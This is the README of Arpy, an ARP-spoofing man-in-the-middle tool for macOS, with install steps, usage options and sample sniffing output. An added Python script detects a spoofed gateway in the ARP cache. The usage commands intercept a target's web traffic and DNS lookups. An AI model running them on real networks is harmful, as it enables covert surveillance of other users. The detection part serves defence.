Arpy - Mac OSX ARP Spoof (MiTM) Tool
Arpy is an easy-to-use ARP spoofing MiTM tool for Mac.
It provides 3 specific functions:
- Packet sniffing
- Visited domains
- Visited domains with Gource
Requirements:
- Python 2.7
- Gource
- Scapy
- libdnet
Installation:
- Gource:
    brew install gource
- Scapy:
    pip install scapy
- libdnet:
    $ git clone https://github.com/dugsong/libdnet.git
    $ cd libdnet
    $ ./configure && make && make install
    $ cd python
    $ python setup.py install
Usage:
    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan

    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>

    ARP MiTM Tool

    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
Packet Sniff:
This is the packet sniffer; it lets you see your target's traffic.
    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan

    [Info] Starting Sniffer...
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*

    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS

    <html>
    <title>><></title>
    <body>
    <pre style="line-height: 1.25; white-space: pre;">
    SORRY / / This page does / ] not exist yet. [ ,'| ] [ / | ]___ ___[ ,' | ] ] /[ [ |: | ] ] / [ [ |: | ] ] ] [ [ [ |: | ] ] ]__ __[ [ [ |: | ] ] ] ] _ /[ [ [ [ |: | ] ] ] ] (#) [ [ [ [ :====' ] ] ]_].nHn.[_[ [ [ ] ] ] HHHHH. [ [ [ ] ] / `HH("N [ [ ]__]/ HHH " [__[ ] NNN [ ] N/" [ ] N H [ / N / q, /
    </pre>
    <h3 id="list"><h3>
    </body>
    <script>
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||
DNS Sniff:
This function lets you see the domain names your target is currently requesting.
    ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        - @viljoenivan

    [Info] Starting DNS Sniffer...
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
DNS Sniff with Gource:
This function is more or less the same as the one above; however, it can pipe its output through Gource to give a live feed of what your target is viewing.
    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
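Seen from the target's side, ARP spoofing between a host and its gateway shows up in the host's own ARP cache: the gateway IP resolves to a MAC that differs from the known-good one, and often to a MAC that another IP on the segment also uses. The check below is an added example, not part of Arpy or of the original page; the `arp -a` text is a constructed sample in the macOS output format, and the function names and the baseline MAC are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of macOS `arp -a` output (not captured from a real network).
SAMPLE_ARP_A = """\
? (192.168.1.1) at 2:0:5e:aa:bb:5 on en0 ifscope [ethernet]
? (192.168.1.3) at 2:0:5e:11:22:33 on en0 ifscope [ethernet]
? (192.168.1.7) at 2:0:5e:aa:bb:5 on en0 ifscope [ethernet]
? (192.168.1.9) at (incomplete) on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
"""

ENTRY = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]+) on (\S+)")

def norm_mac(mac):
    """macOS prints octets without leading zeros (2:0:5e:...); pad to compare."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))

def parse_arp_table(text):
    """Return {ip: mac} for resolved entries; '(incomplete)' and broadcast are skipped."""
    table = {}
    for m in ENTRY.finditer(text):
        mac = norm_mac(m.group(2))
        if mac != "ff:ff:ff:ff:ff:ff":
            table[m.group(1)] = mac
    return table

def check_gateway(table, gateway_ip, known_good_mac=None):
    """List findings that suggest the gateway's ARP entry has been replaced."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["gateway %s has no resolved ARP entry" % gateway_ip]
    # known_good_mac is an assumed baseline recorded while the network was trusted.
    if known_good_mac and gw_mac != norm_mac(known_good_mac):
        findings.append("gateway %s is at %s, baseline is %s"
                        % (gateway_ip, gw_mac, norm_mac(known_good_mac)))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    shared = sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip)
    if shared:
        findings.append("gateway MAC %s is also claimed by %s"
                        % (gw_mac, ", ".join(shared)))
    return findings

if __name__ == "__main__":
    for f in check_gateway(parse_arp_table(SAMPLE_ARP_A), "192.168.1.1", "02:00:5e:00:00:01"):
        print("[!] " + f)
```

A shared MAC can also be legitimate (for example a router that holds several addresses), so treat the second finding as a prompt to compare against the baseline rather than as proof.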